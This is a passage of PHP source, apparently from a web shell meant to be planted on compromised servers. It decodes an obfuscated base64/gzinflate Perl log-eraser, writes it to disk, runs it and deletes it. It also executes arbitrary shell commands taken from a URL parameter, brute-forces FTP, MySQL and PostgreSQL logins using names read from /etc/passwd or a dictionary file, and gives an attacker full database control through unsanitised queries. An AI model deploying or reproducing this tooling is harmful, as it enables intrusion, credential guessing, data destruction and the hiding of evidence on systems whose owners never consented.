3931 $erase = gzinflate(base64_decode("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"));
3932 if(is_writable("."))
3933 {
3934 if($openp = fopen(getcwd()."/logseraser.pl", 'w'))
3935 {
3936 fwrite($openp, $erase);
3937 fclose($openp);
3938 passthru("perl logseraser.pl linux");
3939 unlink("logseraser.pl");
3940 echo "<center><font color=#FFFFFF size=3>Logs Cleared</font></center>";
3941 }
3942 } else
3943 {
3944 if($openp = fopen("/tmp/logseraser.pl", 'w'))
3945 {
3946 fwrite($openp, $erase)or die("Error");
3947 fclose($openp);
3948 $aidx = passthru("perl logseraser.pl linux");
3949 unlink("logseraser.pl");
3950 echo "<center><font color=#FFFFFF size=3>Logs Cleared</font></center>";
3951 }
3952 }
3953 }
3954 else
3955 {
3956 $check = shell_exec($_GET['mycmd']);
3957 echo "<center><textarea cols=120 rows=20 class=box>" . $check . "</textarea></center>";
3958 }
3959}
3960else if(isset($_GET['prototype']))
3961{
3962 echo '<h1>Results</h1><div><span>Type:</span> '.htmlspecialchars($_GET['prototype']).' <span><br>Server:</span> '.htmlspecialchars($_GET['serverport']).'<br>';
3963 if( $_GET['prototype'] == 'ftp' )
3964 {
3965 function BruteFun($ip,$port,$login,$pass)
3966 {
3967 $fp = @ftp_connect($ip, $port?$port:21);
3968 if(!$fp) return false;
3969 $res = @ftp_login($fp, $login, $pass);
3970 @ftp_close($fp);
3971 return $res;
3972 }
3973 }
3974 elseif( $_GET['prototype'] == 'mysql' )
3975 {
3976 function BruteFun($ip,$port,$login,$pass)
3977 {
3978 $res = @mysql_connect($ip.':'.$port?$port:3306, $login, $pass);
3979 @mysql_close($res);
3980 return $res;
3981 }
3982 }
3983 elseif( $_GET['prototype'] == 'pgsql' )
3984 {
3985 function BruteFun($ip,$port,$login,$pass)
3986 {
3987 $str = "host='".$ip."' port='".$port."' user='".$login."' password='".$pass."' dbname=postgres";
3988 $res = @pg_connect($str);
3989 @pg_close($res);
3990 return $res;
3991 }
3992 }
3993
3994 $success = 0;
3995 $attempts = 0;
3996 $server = explode(":", $_GET['server']);
3997 if($_GET['type'] == 1)
3998 {
3999 $temp = @file('/etc/passwd');
4000 if( is_array($temp))
4001 foreach($temp as $line)
4002 {
4003 $line = explode(":", $line);
4004 ++$attempts;
4005 if(BruteFun(@$server[0],@$server[1], $line[0], $line[0]) )
4006 {
4007 $success++;
4008 echo '<b>'.htmlspecialchars($line[0]).'</b>:'.htmlspecialchars($line[0]).'<br>';
4009 }
4010 if(@$_GET['reverse'])
4011 {
4012 $tmp = "";
4013 for($i=strlen($line[0])-1; $i>=0; --$i)
4014 $tmp .= $line[0][$i];
4015 ++$attempts;
4016 if(BruteFun(@$server[0],@$server[1], $line[0], $tmp) )
4017 {
4018 $success++;
4019 echo '<b>'.htmlspecialchars($line[0]).'</b>:'.htmlspecialchars($tmp);
4020 }
4021 }
4022 }
4023 }
4024 elseif($_GET['type'] == 2)
4025 {
4026 $temp = @file($_GET['dict']);
4027 if( is_array($temp) )
4028 foreach($temp as $line)
4029 {
4030 $line = trim($line);
4031 ++$attempts;
4032 if(BruteFun($server[0],@$server[1], $_GET['login'], $line) )
4033 {
4034 $success++;
4035 echo '<b>'.htmlspecialchars($_GET['login']).'</b>:'.htmlspecialchars($line).'<br>';
4036 }
4037 }
4038 }
4039 echo "<span>Attempts:</span> <font class=txt>$attempts</font> <span>Success:</span> <font class=txt>$success</font></div>";
4040}
4041// Execute Query
4042else if(isset($_GET["executeit"]))
4043{
4044 if(isset($_GET['username']) && isset($_GET['server']))
4045 {
4046 $dbserver = $_GET['server'];
4047 $dbuser = $_GET['username'];
4048 $dbpass = $_GET['password'];
4049 if(mysql_connect($dbserver,$dbuser,$dbpass))
4050 {
4051 setcookie("dbserver", $dbserver);
4052 setcookie("dbuser", $dbuser);
4053 setcookie("dbpass", $dbpass);
4054
4055 listdatabase();
4056 }
4057 else
4058 echo "cannotconnect";
4059 }
4060}
4061else if(isset($_GET['action']) && isset($_GET['dbname']))
4062
4063
4064 {
4065 if($_GET['action'] == "createDB")
4066 {
4067 $dbname = $_GET['dbname'];
4068 $dbserver = $_COOKIE["dbserver"];
4069 $dbuser = $_COOKIE["dbuser"];
4070 $dbpass = $_COOKIE["dbpass"];
4071 $mysqlHandle = mysql_connect($dbserver, $dbuser, $dbpass);
4072 mysql_query("create database $dbname",$mysqlHandle);
4073 listdatabase();
4074 }
4075 if($_GET['action'] == 'dropDB')
4076 {
4077 $dbname = $_GET['dbname'];
4078 $dbserver = $_COOKIE["dbserver"];
4079 $dbuser = $_COOKIE["dbuser"];
4080 $dbpass = $_COOKIE["dbpass"];
4081 $mysqlHandle = mysql_connect($dbserver, $dbuser, $dbpass);
4082 mysql_query("drop database $dbname",$mysqlHandle);
4083 mysql_close($mysqlHandle);
4084 listdatabase();
4085 }
4086
4087 if($_GET['action'] == 'listTables')
4088 {
4089 listtable();
4090 }
4091
4092 // Create Tables
4093 if($_GET['action'] == "createtable")
4094 {
4095 $dbserver = $_COOKIE["dbserver"];
4096 $dbuser = $_COOKIE["dbuser"];
4097 $dbpass = $_COOKIE["dbpass"];
4098 $dbname = $_GET['dbname'];
4099 $tablename = $_GET['tablename'];
4100 $mysqlHandle = mysql_connect ($dbserver, $dbuser, $dbpass);
4101 mysql_select_db($dbname);
4102 mysql_query("CREATE TABLE $tablename ( no INT )");
4103 listtable();
4104 }
4105
4106 // Drop Tables
4107 if($_GET['action'] == "dropTable")
4108 {
4109 $dbserver = $_COOKIE["dbserver"];
4110 $dbuser = $_COOKIE["dbuser"];
4111 $dbpass = $_COOKIE["dbpass"];
4112 $dbname = $_GET['dbname'];
4113 $tablename = $_GET['tablename'];
4114 $mysqlHandle = mysql_connect ($dbserver, $dbuser, $dbpass);
4115 mysql_select_db($dbname);
4116 mysql_query("drop table $tablename");
4117 listtable();
4118 }
4119
4120 // Empty Tables
4121 if($_GET['action'] == "empty")
4122 {
4123 $dbserver = $_COOKIE["dbserver"];
4124 $dbuser = $_COOKIE["dbuser"];
4125 $dbpass = $_COOKIE["dbpass"];
4126 $dbname = $_GET['dbname'];
4127 $tablename = $_GET['tablename'];
4128 $mysqlHandle = mysql_connect ($dbserver, $dbuser, $dbpass);
4129 mysql_select_db($dbname);
4130 mysql_query("delete from $tablename");
4131 listtable();
4132 }
4133
4134 // Empty Tables
4135 if($_GET['action'] == "dropField")
4136 {
4137 $dbserver = $_COOKIE["dbserver"];
4138 $dbuser = $_COOKIE["dbuser"];
4139 $dbpass = $_COOKIE["dbpass"];
4140 $dbname = $_GET['dbname'];
4141 $tablename = $_GET['tablename'];
4142 $fieldname = $_GET['fieldname'];
4143 $mysqlHandle = mysql_connect ($dbserver, $dbuser, $dbpass);
4144 mysql_select_db($dbname);
4145 $queryStr = "ALTER TABLE $tablename DROP COLUMN $fieldname";
4146 mysql_select_db( $dbname, $mysqlHandle );
4147 mysql_query( $queryStr , $mysqlHandle );
4148 listtable();
4149 }
4150
4151 if($_GET['action'] == 'viewdb')
4152 {
4153 listdatabase();
4154 }
4155
4156 // View Table Schema
4157 if($_GET['action'] == "viewSchema")
4158 {
4159 $dbserver = $_COOKIE["dbserver"];
4160 $dbuser = $_COOKIE["dbuser"];
4161 $dbpass = $_COOKIE["dbpass"];
4162 $dbname = $_GET['dbname'];
4163 $tablename = $_GET['tablename'];
4164 $mysqlHandle = mysql_connect ($dbserver, $dbuser, $dbpass);
4165 mysql_select_db($dbname);
4166 echo "<br><div><font color=white size=3>[ $dbname ]</font> - <font color=white size=3>></font> <a href=# onClick=\"viewtables('viewdb')\"> <font size=3>Database List</font> </a> <font color=white size=3>></font> <a href=# onClick=\"viewtables('listTables','$dbname','$tablename')\"> <font size=3>Table List</font> </a> <a href=$self?logoutdb> <font size=3>[ Log Out ]</font> </a></div>";
4167 $pResult = mysql_query( "SHOW fields FROM $tablename" );
4168 $num = mysql_num_rows( $pResult );
4169 echo "<br><br><table align=center cellspacing=4 style='width:80%;' border=1>";
4170 echo "<th>Field</th><th>Type</th><th>Null</th><th>Key</th></th>";
4171 for( $i = 0; $i < $num; $i++ )
4172 {
4173 $field = mysql_fetch_array( $pResult );
4174 echo "<tr>\n";
4175 echo "<td>".$field["Field"]."</td>\n";
4176 echo "<td>".$field["Type"]."</td>\n";
4177 echo "<td>".$field["Null"]."</td>\n";
4178 echo "<td>".$field["Key"]."</td>\n";
4179 echo "<td>".$field["Default"]."</td>\n";
4180 echo "<td>".$field["Extra"]."</td>\n";
4181 $fieldname = $field["Field"];
4182 echo "<td><a href=# onClick=\"viewtables('dropField','$dbname','$tablename','','','','$fieldname')\">Drop</a></td>\n";
4183 echo "</tr>\n";
4184 }
4185 echo "</table>";
4186 echo "<div><font color=white size=3>[ $dbname ]</font> - <font color=white size=3>></font> <a href=# onClick=\"viewtables('viewdb')\"> <font size=3>Database List</font> </a> <font color=white size=3>></font> <a href=# onClick=\"viewtables('listTables','$dbname','$tablename')\"> <font size=3>Table List</font> </a> <a href=$self?logoutdb> <font size=3>[ Log Out ]</font> </a></div>";
4187 }
4188
4189 // Execute Query
4190 if($_GET['action'] == "executequery")
4191 {
4192 $dbserver = $_COOKIE["dbserver"];
4193 $dbuser = $_COOKIE["dbuser"];
4194 $dbpass = $_COOKIE["dbpass"];
4195 $dbname = $_GET['dbname'];
4196 $tablename = $_GET['tablename'];
4197 $mysqlHandle = mysql_connect ($dbserver, $dbuser, $dbpass);
4198 mysql_select_db($dbname);
4199 $result = mysql_query($_GET['executemyquery']);
4200
4201 // results
4202 echo "<html>\r\n". strtoupper($_GET['executemyquery']) . "<br>\r\n<table border =\"1\">\r\n";
4203
4204 $count = 0;
4205 while ($row = mysql_fetch_assoc($result))
4206 {
4207 echo "<tr>\r\n";
4208
4209 if ($count==0) // list column names
4210 {
4211 echo "<tr>\r\n";
4212 while($key = key($row))
4213 {
4214 echo "<td><b>" . $key . "</b></td>\r\n";
4215 next($row);
4216 }
4217 echo "</tr>\r\n";
4218 }
4219
4220 foreach($row as $r) // list content of column names
4221 {
4222 if ($r=='') $r = '<font >NULL</font>';
4223 echo "<td><font class=txt>" . $r . "</font></td>\r\n";
4224 }
4225 echo "</tr>\r\n";
4226 $count++;
4227 }
4228 echo "</table>\n\r<font class=txt size=3>" . $count . " rows returned.</font>\r\n</html>";
4229 echo "<div><font color=white size=3>[ $dbname ]</font> - <font color=white size=3>></font> <a href=# onClick=\"viewtables('viewdb')\"> <font size=3>Database List</font> </a> <font color=white size=3>></font> <a href=# onClick=\"viewtables('listTables','$dbname','$tablename')\"> <font size=3>Table List</font> </a> <a href=$self?logoutdb> <font size=3>[ Log Out ]</font> </a></div>";
4230 }
4231
4232 // View Table Data
4233 if($_GET['action'] == "viewdata")
4234 {
4235 global $queryStr, $action, $mysqlHandle, $dbname, $tablename, $PHP_SELF, $errMsg, $page, $rowperpage, $orderby, $data;
4236 $dbserver = $_COOKIE["dbserver"];
4237 $dbuser = $_COOKIE["dbuser"];
4238 $dbpass = $_COOKIE["dbpass"];
4239 $dbname = $_GET['dbname'];
4240 $tablename = $_GET['tablename'];
4241 echo "<br><div><font color=white size=3>[ $dbname ]</font> - <font color=white size=3>></font> <a href=# onClick=\"viewtables('viewdb')\"> <font size=3>Database List</font> </a> <font color=white size=3>></font> <a href=# onClick=\"viewtables('listTables','$dbname','$tablename')\"> <font size=3>Table List</font> </a> <a href=$self?logoutdb> <font size=3>[ Log Out ]</font> </a></div>";
4242 ?>
4243 <br><br>
4244 <form>
4245 <table>
4246 <tr>
4247 <td><textarea cols="60" rows="7" name="executemyquery" class="box">Execute Query..</textarea></td>
4248 </tr>
4249 <tr>
4250 <td><input type="button" onClick="viewtables('executequery','<?php echo $_GET['dbname'];?>','<?php echo $_GET['tablename']; ?>','','',executemyquery.value)" value="Execute" class="but"></td>
4251 </tr>
4252 </table>
4253 </form>
4254 <?php
4255 $mysqlHandle = mysql_connect ($dbserver, $dbuser, $dbpass);
4256 mysql_select_db($dbname);
4257
4258 $sql = mysql_query("SELECT `COLUMN_NAME` FROM `information_schema`.`COLUMNS` WHERE (`TABLE_SCHEMA` = '$dbname') AND (`TABLE_NAME` = '$tablename') AND (`COLUMN_KEY` = 'PRI');");
4259 $row = mysql_fetch_array($sql);
4260 $rowid = $row['COLUMN_NAME'];
4261
4262 echo "<br><font size=4 color =lime>Data in Table</font><br>";
4263 if( $tablename != "" )
4264 echo "<font size=3 class=txt>$dbname > $tablename</font><br>";
4265 else
4266 echo "<font size=3 class=txt>$dbname</font><br>";
4267
4268 $queryStr = "";
4269 $pag = 0;
4270 $queryStr = stripslashes( $queryStr );
4271 if( $queryStr == "" )
4272 {
4273 if(isset($_REQUEST['page']))
4274 {
4275 $res = mysql_query("select * from $tablename");
4276 $getres = mysql_num_rows($res);
4277 $coun = ceil($getres/30);
4278 if($_REQUEST['page'] != 1)
4279
4280 $pag = $_REQUEST['page'] * 30;
4281 else
4282 $pag = $_REQUEST['page'] * 30;
4283
4284 $queryStr = "SELECT * FROM $tablename LIMIT $pag,30";
4285 $sql = mysql_query("SELECT $rowid FROM $tablename ORDER BY $rowid LIMIT $pag,30");
4286 $arrcount = 1;
4287 $arrdata[$arrcount] = 0;
4288 while($row = mysql_fetch_array($sql))
4289 {
4290 $arrdata[$arrcount] = $row[$rowid];
4291 $arrcount++;
4292 }
4293 }
4294 else
4295 {
4296 $queryStr = "SELECT * FROM $tablename LIMIT 0,30";
4297 $sql = mysql_query("SELECT $rowid FROM $tablename ORDER BY $rowid LIMIT 0,30");
4298 $arrcount = 1;
4299 $arrdata[$arrcount] = 0;
4300 while($row = mysql_fetch_array($sql))
4301 {
4302 $arrdata[$arrcount] = $row[$rowid];
4303 $arrcount++;
4304 }
4305 }
4306 if( $orderby != "" )
4307 $queryStr .= " ORDER BY $orderby";
4308 echo "<a href=# onClick=\"viewtables('viewSchema','$dbname','$tablename')\"><font size=3>Schema</font></a>\n";
4309 }
4310
4311
4312 $pResult = mysql_query($queryStr );
4313 $fieldt = mysql_fetch_field($pResult);
4314 $tablename = $fieldt->table;
4315 $errMsg = mysql_error();
4316
4317 $GLOBALS[queryStr] = $queryStr;
4318
4319 if( $pResult == false )
4320 {
4321 echoQueryResult();
4322 return;
4323 }
4324 if( $pResult == 1 )
4325 {
4326 $errMsg = "Success";
4327 echoQueryResult();
4328 return;
4329 }
4330
4331 echo "<hr color='#1B1B1B'>\n";
4332
4333 $row = mysql_num_rows( $pResult );
4334 $col = mysql_num_fields( $pResult );
4335
4336 if( $row == 0 )
4337 {
4338 echo "<font size=3>No Data Exist!</font>";
4339 return;
4340 }
4341
4342 if( $rowperpage == "" ) $rowperpage = 30;
4343 if( $page == "" ) $page = 0;
4344 else $page--;
4345 mysql_data_seek( $pResult, $page * $rowperpage );
4346
4347 echo "<table cellspacing=1 cellpadding=5 border=1 align=center>\n";
4348 echo "<tr>\n";
4349 for( $i = 0; $i < $col; $i++ )
4350 {
4351 $field = mysql_fetch_field( $pResult, $i );
4352 echo "<th>";
4353 if($action == "viewdata")
4354 echo "<a href='$PHP_SELF?action=viewdata&dbname=$dbname&tablename=$tablename&orderby=".$field->name."'>".$field->name."</a>\n";
4355 else
4356 echo $field->name."\n";
4357 echo "</th>\n";
4358 }
4359 echo "<th colspan=2>Action</th>\n";
4360 echo "</tr>\n";
4361 $num=1;
4362
4363
4364 $acount = 1;
4365
4366 for( $i = 0; $i < $rowperpage; $i++ )
4367 {
4368 $rowArray = mysql_fetch_row( $pResult );
4369 if( $rowArray == false ) break;
4370 echo "<tr>\n";
4371 $key = "";
4372 for( $j = 0; $j < $col; $j++ )
4373 {
4374 $data = $rowArray[$j];
4375
4376 $field = mysql_fetch_field( $pResult, $j );
4377 if( $field->primary_key == 1 )
4378 $key .= "&" . $field->name . "=" . $data;
4379
4380 if( strlen( $data ) > 30 )
4381 $data = substr( $data, 0, 30 ) . "...";
4382 $data = htmlspecialchars( $data );
4383 echo "<td>\n";
4384 echo "<font class=txt>$data</font>\n";
4385 echo "</td>\n";
4386 }
4387
4388 if(!is_numeric($arrdata[$acount]))
4389 echo "<td colspan=2>No Key</td>\n";
4390 else
4391 {
4392 echo "<td><a href=# onClick=\"viewtables('editData','$dbname','$tablename','$rowid','$arrdata[$acount]')\">Edit</a></td>\n";
4393 echo "<td><a href=# onClick=\"viewtables('deleteData','$dbname','$tablename','$rowid','$arrdata[$acount]')\">Delete</a></td>\n";
4394 $acount++;
4395 }
4396 }
4397 echo "</tr>\n";
4398
4399
4400 echo "</table>";
4401 if($arrcount > 30)
4402 {
4403 $res = mysql_query("select * from $tablename");
4404 $getres = mysql_num_rows($res);
4405 $coun = ceil($getres/30);
4406 echo "<form action=$self><input type=hidden value=viewdata name=action><input type=hidden name=tablename value=$tablename><input type=hidden value=$dbname name=dbname><select style='width: 95px;' name=page class=sbox>";
4407 for($i=0;$i<$coun;$i++)
4408 echo "<option value=$i>$i</option>";
4409
4410 echo "</select> <input type=button onClick=\"viewtables('viewdata','$dbname','$tablename','','','','',page.value)\" value=Go class=but></form>";
4411 echo "<br><div><font color=white size=3>[ $dbname ]</font> - <font color=white size=3>></font> <a href=# onClick=\"viewtables('viewdb')\"> <font size=3>Database List</font> </a> <font color=white size=3>></font> <a href=# onClick=\"viewtables('listTables','$dbname','$tablename')\"> <font size=3>Table List</font> </a> <a href=$self?logoutdb> <font size=3>[ Log Out ]</font> </a></div>";
4412 }
4413 }
4414
4415 // Delete Table Data
4416 if($_GET['action'] == "deleteData")
4417 {
4418 $dbserver = $_COOKIE["dbserver"];
4419 $dbuser = $_COOKIE["dbuser"];
4420 $dbpass = $_COOKIE["dbpass"];
4421 $dbname = $_GET['dbname'];
4422 $tablename = $_GET['tablename'];
4423 $mysqlHandle = mysql_connect ($dbserver, $dbuser, $dbpass);
4424 mysql_select_db($dbname);
4425 $sql = mysql_query("SELECT `COLUMN_NAME` FROM `information_schema`.`COLUMNS` WHERE (`TABLE_SCHEMA` = '$dbname') AND (`TABLE_NAME` = '$tablename') AND (`COLUMN_KEY` = 'PRI');");
4426 $row = mysql_fetch_array($sql);
4427 $row = $row['COLUMN_NAME'];
4428 $rowid = $_GET[$row];
4429 mysql_query("delete from $tablename where $row = '$rowid'");
4430 listtable();
4431 }
4432 // Edit Table Data
4433 if($_GET['action'] == "editData")
4434 {
4435 global $queryStr, $action, $mysqlHandle, $dbname, $tablename, $PHP_SELF, $errMsg, $page, $rowperpage, $orderby, $data;
4436 $dbserver = $_COOKIE["dbserver"];
4437 $dbuser = $_COOKIE["dbuser"];
4438 $dbpass = $_COOKIE["dbpass"];
4439 $dbname = $_GET['dbname'];
4440 $tablename = $_GET['tablename'];
4441 echo "<br><div><font color=white size=3>[ $dbname ]</font> - <font color=white size=3>></font> <a href=# onClick=\"viewtables('viewdb')\"> <font size=3>Database List</font> </a> <font color=white size=3>></font> <a href=# onClick=\"viewtables('listTables','$dbname','$tablename')\"> <font size=3>Table List</font> </a> <a href=$self?logoutdb> <font size=3>[ Log Out ]</font> </a></div>";
4442 ?>
4443 <br><br>
4444 <form action="<?php echo $self; ?>" method="post">
4445 <?php
4446 $mysqlHandle = mysql_connect ($dbserver, $dbuser, $dbpass);
4447 mysql_select_db($dbname);
4448
4449 $sql = mysql_query("SELECT `COLUMN_NAME` FROM `information_schema`.`COLUMNS` WHERE (`TABLE_SCHEMA` = '$dbname') AND (`TABLE_NAME` = '$tablename') AND (`COLUMN_KEY` = 'PRI');");
4450 $row = mysql_fetch_array($sql);
4451 $row = $row['COLUMN_NAME'];
4452 $rowid = $_GET[$row];
4453
4454 $pResult = mysql_list_fields( $dbname, $tablename );
4455 $num = mysql_num_fields( $pResult );
4456
4457 $key = "";
4458 for( $i = 0; $i < $num; $i++ )
4459 {
4460 $field = mysql_fetch_field( $pResult, $i );
4461 if( $field->primary_key == 1 )
4462 if( $field->numeric == 1 )
4463 $key .= $field->name . "=" . $GLOBALS[$field->name] . " AND ";
4464 else
4465 $key .= $field->name . "='" . $GLOBALS[$field->name] . "' AND ";
4466 }
4467 $key = substr( $key, 0, strlen($key)-4 );
4468
4469 mysql_select_db( $dbname, $mysqlHandle );
4470 $pResult = mysql_query( $queryStr = "SELECT * FROM $tablename WHERE $row = $rowid", $mysqlHandle );
4471 $data = mysql_fetch_array( $pResult );
4472
4473 echo "<table cellspacing=1 cellpadding=2 border=1>\n";
4474 echo "<tr>\n";
4475 echo "<th>Name</th>\n";
4476 echo "<th>Type</th>\n";
4477 echo "<th>Function</th>\n";
4478 echo "<th>Data</th>\n";
4479 echo "</tr>\n";
4480
4481 $pResult = mysql_db_query( $dbname, "SHOW fields FROM $tablename" );
4482 $num = mysql_num_rows( $pResult );
4483
4484 $pResultLen = mysql_list_fields( $dbname, $tablename );
4485 $fundata1 = "'action','editsubmitData','dbname','".$dbname."','tablename','".$tablename."',";
4486 $fundata2 = "'action','insertdata','dbname','".$dbname."','tablename','".$tablename."',";
4487 for( $i = 0; $i < $num; $i++ )
4488 {
4489 $field = mysql_fetch_array( $pResult );
4490 $fieldname = $field["Field"];
4491 $fieldtype = $field["Type"];
4492 $len = mysql_field_len( $pResultLen, $i );
4493
4494 echo "<tr>";
4495 echo "<td>$fieldname</td>";
4496 echo "<td>".$field["Type"]."</td>";
4497 echo "<td>\n";
4498 echo "<select name=${fieldname}_function class=sbox>\n";
4499 echo "<option>\n";
4500 echo "<option>ASCII\n";
4501 echo "<option>CHAR\n";
4502 echo "<option>SOUNDEX\n";
4503 echo "<option>CURDATE\n";
4504 echo "<option>CURTIME\n";
4505 echo "<option>FROM_DAYS\n";
4506 echo "<option>FROM_UNIXTIME\n";
4507 echo "<option>NOW\n";
4508 echo "<option>PASSWORD\n";
4509 echo "<option>PERIOD_ADD\n";
4510 echo "<option>PERIOD_DIFF\n";
4511 echo "<option>TO_DAYS\n";
4512 echo "<option>USER\n";
4513 echo "<option>WEEKDAY\n";
4514 echo "<option>RAND\n";
4515 echo "</select>\n";
4516 echo "</td>\n";
4517 $value = htmlspecialchars($data[$i]);
4518 $type = strtok( $fieldtype, " (,)\n" );
4519 if( $type == "enum" || $type == "set" )
4520 {
4521 echo "<td>\n";
4522 if( $type == "enum" )
4523 echo "<select name=$fieldname class=box>\n";
4524 else if( $type == "set" )
4525 echo "<select name=$fieldname size=4 class=box multiple>\n";
4526 while( $str = strtok( "'" ) )
4527 {
4528 if( $value == $str )
4529 echo "<option selected>$str\n";
4530 else
4531 echo "<option>$str\n";
4532 strtok( "'" );
4533 }
4534 echo "</select>\n";
4535 echo "</td>\n";
4536 }
4537 else
4538 {
4539 if( $len < 40 )
4540 echo "<td><input type=text size=40 maxlength=$len id=dhanush_$fieldname name=sql_$fieldname value=\"$value\" class=box></td>\n";
4541 else
4542 echo "<td><textarea cols=47 rows=3 maxlength=$len name=dhanush_$fieldname class=box>$value</textarea>\n";
4543 }
4544 $fundata1 .= "'dhanush_".$fieldname."',dhanush_".$fieldname.".value,";
4545 $fundata2 .= "'dhanush_".$fieldname."',dhanush_".$fieldname.".value,";
4546 echo "</tr>";
4547 }
4548 $fundata1=eregi_replace(',$', '', $fundata1);
4549 $fundata2=eregi_replace(',$', '', $fundata2);
4550
4551 echo "</table><p>\n";
4552 echo "<input type=button onClick=\"editdata($fundata1)\" value='Edit Data' class=but>\n";
4553 echo "<input type=button value='Insert' onClick=\"editdata($fundata2)\" class=but>\n";
4554 echo "</form>\n";
4555 }
4556 }
4557// Edit Submit Table Data
4558else if($_REQUEST['action'] == "editsubmitData")
4559{
4560 $dbserver = $_COOKIE["dbserver"];
4561 $dbuser = $_COOKIE["dbuser"];
4562 $dbpass = $_COOKIE["dbpass"];
4563 $dbname = $_POST['dbname'];
4564 $tablename = $_POST['tablename'];
4565
4566 $mysqlHandle = mysql_connect ($dbserver, $dbuser, $dbpass);
4567 mysql_select_db($dbname);
4568
4569 $sql = mysql_query("SELECT `COLUMN_NAME` FROM `information_schema`.`COLUMNS` WHERE (`TABLE_SCHEMA` = '$dbname') AND (`TABLE_NAME` = '$tablename') AND (`COLUMN_KEY` = 'PRI');");
4570 $row = mysql_fetch_array($sql);
4571 $row = $row['COLUMN_NAME'];
4572 $rowid = $_POST[$row];
4573
4574 $pResult = mysql_db_query( $dbname, "SHOW fields FROM $tablename" );
4575 $num = mysql_num_rows( $pResult );
4576
4577 $rowcount = $num;
4578
4579 $pResultLen = mysql_list_fields( $dbname, $tablename );
4580
4581 for( $i = 0; $i < $num; $i++ )
4582 {
4583 $field = mysql_fetch_array( $pResult );
4584 $fieldname = $field["Field"];
4585 $arrdata = $_REQUEST[$fieldname];
4586
4587 $str .= " " . $fieldname . " = '" . $arrdata . "'";
4588 $rowcount--;
4589 if($rowcount != 0)
4590 $str .= ",";
4591 }
4592
4593 $str = "update $tablename set" . $str . " where $row=$rowid";
4594 mysql_query($str);
4595 ?><div id="showsql"></div><?php
4596}
4597// Insert Table Data
4598else if($_REQUEST['action'] == "insertdata")
4599{
4600 $dbserver = $_COOKIE["dbserver"];
4601 $dbuser = $_COOKIE["dbuser"];
4602 $dbpass = $_COOKIE["dbpass"];
4603 $dbname = $_POST['dbname'];
4604 $tablename = $_POST['tablename'];
4605
4606 $mysqlHandle = mysql_connect ($dbserver, $dbuser, $dbpass);
4607 mysql_select_db($dbname);
4608
4609 $sql = mysql_query("SELECT `COLUMN_NAME` FROM `information_schema`.`COLUMNS` WHERE (`TABLE_SCHEMA` = '$dbname') AND (`TABLE_NAME` = '$tablename') AND (`COLUMN_KEY` = 'PRI');");
4610 $row = mysql_fetch_array($sql);
4611 $row = $row['COLUMN_NAME'];
4612 $rowid = $_POST[$row];
4613
